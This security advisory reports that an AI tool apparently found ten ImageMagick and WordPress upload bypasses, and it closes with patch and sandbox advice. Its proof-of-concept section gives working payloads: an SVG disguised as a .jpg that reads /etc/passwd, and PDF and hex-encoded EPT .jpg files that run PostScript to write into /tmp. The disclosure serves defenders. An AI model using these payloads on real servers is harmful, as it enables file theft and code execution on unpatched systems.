AI Tool Discovers Critical Zero-Day Vulnerabilities in ImageMagick Default Policies

Octagon Networks' AI tool, pwn.ai, discovered 10 zero-day vulnerabilities and policy bypasses in the ImageMagick image processing library. 

These flaws affect millions of servers across major Linux distributions and WordPress installations, allowing attackers to run malicious code or steal data through simple image uploads. Because these are newly discovered zero-days, official CVSS scores have not been assigned yet, and many remain unpatched in standard software repositories.

Vulnerabilities summary:

• Arbitrary file read via the text: coder in SVG disguised as .jpg (High severity, bypasses open policy)
• Arbitrary file read via label:@ coder on macOS (High severity, open policy)
• SVG magic bytes bypass of extension-based filtering across all file extensions (Medium severity, all policies)
• EPSI/EPI/EPSF coders not included in Ubuntu's default PS/EPS blocklist, invoking GhostScript (Critical severity, open policy and Ubuntu default)
• Single-byte (\n) prefix bypass of PostScript format detection while GhostScript still executes (High severity, all policies)
• PDF module not blocked in any policy, invoking the same GhostScript delegate as PS (Critical severity, bypasses open, limited, secure with gslib, and the maintainer's own recommended fix)
• EPT (Encapsulated PostScript with TIFF preview) magic bytes in .jpg bypass limited policy (Critical severity, affects ImageMagick versions up to 6.9.13-33, including Ubuntu 22.04's shipped version 6.9.11-60)
• gslib compiled-in GhostScript bypasses the secure policy's delegate blocking entirely (Critical severity, affects Amazon Linux, RHEL, Fedora, and other gslib-compiled systems)
• WordPress XML-RPC upload path skips content validation, enabling Author-level file write (High severity)
• WordPress with Gravity Forms (2M+ active installations) allows pre-authentication file write via Post Image fields (Critical severity)

These vulnerabilities enable unauthenticated remote code execution (RCE) on platforms like WordPress. Attackers can chain file writes to the /tmp directory with the Magick Scripting Language (MSL) to drop persistent webshells or poison PHP sessions to gain administrative access. Beyond full system takeover, these flaws enable RAM-exhaustion Denial-of-Service (DoS) attacks and the theft of critical environment variables, including AWS credentials and SSH keys.

The vulnerabilities affect ImageMagick across its default "open" security policy, the recommended production-grade "limited" policy, and on systems where GhostScript is compiled as a linked library (gslib), even the most restrictive "secure" policy.

Proof of Concept

File Read:

Works on Ubuntu 22.04 (Latest with latest ImageMagick by default)

printf '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500"><image xlink:href="text:/etc/passwd" x="0" y="0" width="500" height="500"/></svg>' > read.jpg
convert read.jpg output.png
# output.png contains /etc/passwd rendered as visible text

File Write via PDF

printf '\n%%!PS-Adobe-3.0 EPSF-3.0\n%%%%BoundingBox: 0 0 100 100\n/f (/tmp/PWNED) (w) file def\nf (HI) writestring\nf closefile\nshowpage\n' > evil.pdf
convert evil.pdf out.png
cat /tmp/PWNED
# Output: HI

File Write via EPT .jpg 

printf '\xc5\xd0\xd3\xc6\x1e\x00\x00\x00\x7a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0a\x25\x21\x50\x53\x2d\x41\x64\x6f\x62\x65\x2d\x33\x2e\x30\x20\x45\x50\x53\x46\x2d\x33\x2e\x30\x0a\x25\x25\x42\x6f\x75\x6e\x64\x69\x6e\x67\x42\x6f\x78\x3a\x20\x30\x20\x30\x20\x31\x30\x30\x20\x31\x30\x30\x0a\x2f\x66\x20\x28\x2f\x74\x6d\x70\x2f\x50\x57\x4e\x45\x44\x29\x20\x28\x77\x29\x20\x66\x69\x6c\x65\x20\x64\x65\x66\x0a\x66\x20\x28\x52\x43\x45\x29\x20\x77\x72\x69\x74\x65\x73\x74\x72\x69\x6e\x67\x0a\x66\x20\x63\x6c\x6f\x73\x65\x66\x69\x6c\x65\x0a\x73\x68\x6f\x77\x70\x61\x67\x65\x0a' > evil.jpg
convert evil.jpg out.png
cat /tmp/PWNED

These security flaws affect every major Linux distribution, including Ubuntu 22.04, Debian 11/12, RHEL, and Amazon Linux. WordPress installations are especially at risk because the core software relies on server-level policy.xml defaults, which are often insecure. 

While a silent fix was introduced in ImageMagick 6.9.13-34, it has not been assigned a CVE or backported to many LTS distributions, leaving millions of servers exposed.

Security teams should update ImageMagick to the latest version and verify that dangerous coders like EPT, PDF, and MSL are explicitly disabled in the policy.xml file. 

If PostScript processing is not required, removing the GhostScript package entirely provides the most effective protection against these exploit chains. For environments that must process untrusted PDFs, administrators should run ImageMagick within an isolated sandbox that lacks network access and uses a read-only file system.